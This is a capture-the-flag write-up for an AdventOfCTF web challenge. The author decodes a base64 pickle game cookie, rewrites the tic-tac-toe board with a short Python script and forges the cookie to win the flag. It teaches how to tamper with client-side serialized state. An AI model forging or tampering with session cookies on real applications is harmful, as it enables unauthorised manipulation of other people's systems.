+++ author = "Maik de Kruif" title = "Challenge 20 - AdventOfCTF" date = 2021-02-26T00:11:35+01:00 description = "A writeup for challenge 20 of AdventOfCTF." cover = "img/adventofctf/2020/c1f93b6ee2e1cd25ea02f9a78c364b12.png" tags = [ "AdventOfCTF", "challenge", "ctf", "hacking", "writeup", "web", "python", "serialization", ] categories = [ "ctf", "writeups", "hacking", ] +++ - Points: 2000 ## Description To pass the time until Christmas the elves challenge Santa to a game of tic-tac-toe. Santa plays X, can you make him win? Visit to start the challenge. ## Recon When looking around on the page, we can see a tic tac toe board with two links in it. These links direct to `/play/y/x` and place an `O` on the board. After placing it, `O` wins. If we take a look at the source, we also find a bit of javascript: ```js function send() { let emoji = $("#emoji")[0].value; if (emoji.length > 0) { $.post("/", { emoji: emoji }, function (data) { $("#msg")[0].innerHTML = "" + data + ""; }); } } ``` This code doesn't seem to be used though and I don't see what it would be used for so we'll ignore it for now. Lastly, we can check the cookies on the website. Here we can find the `game` cookie. It looks like it's some `base64` encoded data. ```text game=gAN9cQAoWAUAAABib2FyZHEBXXECKF1xAyhYAQAAAE9xBGgETmVdcQUoaARYAQAAAFhxBmgGZV1xByhOaAZoBmVlWAQAAAB0dXJucQhoBFgIAAAAZmluaXNoZWRxCYlYBgAAAHdpbm5lcnEKTlgEAAAAc2FuZXELiHUu ``` ## Finding the vulnerability We will start by having a look at the `game` cookie. If we base64 decode it we do see some information about a board, but its not plain text. ```bash echo -n "gAN9cQAoWAUAAABib2FyZHEBXXECKF1xAyhYAQAAAE9xBGgETmVdcQUoaARYAQAAAFhxBmgGZV1xByhOaAZoBmVlWAQAAAB0dXJucQhoBFgIAAAAZmluaXNoZWRxCYlYBgAAAHdpbm5lcnEKTlgEAAAAc2FuZXELiHUu" | base64 -d ``` ```text �}q(Xboardq]q(]q(XOqhNe]q(hXXqhe]q(NhheeXturnhfinishedq �Xwinnerq NXsaneq �u.⏎ ``` By the looks of it, it might be a serialized object but we don't know where it came from. To find out what the backend framework of the server is, we can look at the `Server` header in the http response. This is not always filled in with useful information, but this time it was. ```text Server: Werkzeug/1.0.1 Python/3.7.10 ``` Here we can see the website uses Python for the backend. This narrows the amount of possible serialization libraries down a lot. A common library used for this in Python is Pickle. To test whether the cookie is encoded pickle data, we can use the pickle's `loads` function to import the data from a string: ```text >>> import pickle >>> import base64 >>> pickle.loads(base64.b64decode("gAN9cQAoWAUAAABib2FyZHEBXXECKF1xAyhYAQAAAE9xBGgETmVdcQUoaARYAQAAAFhxBmgGZV1xByhOaAZoBmVlWAQAAAB0dXJucQhoBFgIAAAAZmluaXNoZWRxCYlYBgAAAHdpbm5lcnEKTlgEAAAAc2FuZXELiHUu")) {'board': [['O', 'O', None], ['O', 'X', 'X'], [None, 'X', 'X']], 'turn': 'O', 'finished': False, 'winner': '', 'sane': True} ``` Yes! It's using pickle and we can now try to alter the board. ## Exploit To alter the board, we can write a little Python script like the following. You can't just put three `X` in a row as the backend checks the game state. To get around this, we can just place a few `O` on the board. ```py import base64 import pickle board_b64 = "gAN9cQAoWAUAAABib2FyZHEBXXECKF1xAyhYAQAAAE9xBGgETmVdcQUoaARYAQAAAFhxBmgGZV1xByhOaAZoBmVlWAQAAAB0dXJucQhoBFgIAAAAZmluaXNoZWRxCYlYBgAAAHdpbm5lcnEKTlgEAAAAc2FuZXELiHUu" data = pickle.loads(base64.b64decode(board_b64)) data["board"] = [['X', 'X', 'X'], ['O', None, None], [None, None, 'O']] data["winner"] = 'X' data["turn"] = 'O' print(base64.b64encode(pickle.dumps(data))) ``` ```text gASVVwAAAAAAAAB9lCiMBWJvYXJklF2UKF2UKIwBWJRoBGgEZV2UKIwBT5ROaAZlXZQoTk5OZWWMBHR1cm6UaAaMCGZpbmlzaGVklImMBndpbm5lcpRoBIwEc2FuZZSIdS4= ``` We can then replace the `game` cookie with this string and reload the page. ## Solution We got the flag! It is `NOVI{p1ckle_r1ck}`.